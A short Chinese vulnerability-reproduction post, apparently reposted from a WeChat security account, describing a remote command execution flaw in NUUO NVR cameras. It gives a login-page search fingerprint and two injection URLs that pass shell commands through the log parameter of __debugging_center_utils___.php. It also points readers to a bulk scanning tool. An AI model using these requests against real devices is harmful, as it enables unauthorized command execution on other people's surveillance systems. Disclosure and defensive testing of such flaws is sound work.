NUUO NVR是一款用于监控和视频管理的设备,通常与IP摄像头配合使用。它能够实时录制、存储和管理来自多个摄像头的视频流。NUUO NVR支持多种视频编码格式,并提供了丰富的功能,如运动检测、事件触发、远程访问、云存储等。
NUUO NVR摄像头在debugging_center_utils接口处存在远程命令执行,攻击者可通过该漏洞在服务器上执行任意命令,获取服务器权限。
title="Network Video Recorder Login"
/__debugging_center_utils___.php?log=|id
/__debugging_center_utils___.php?log=;whoami
批量检测(批量检测POC工具请前往知识星球获取):
原文始发于微信公众号(白帽攻防):【漏洞复现】NUUO摄像头远程命令执行漏洞
评论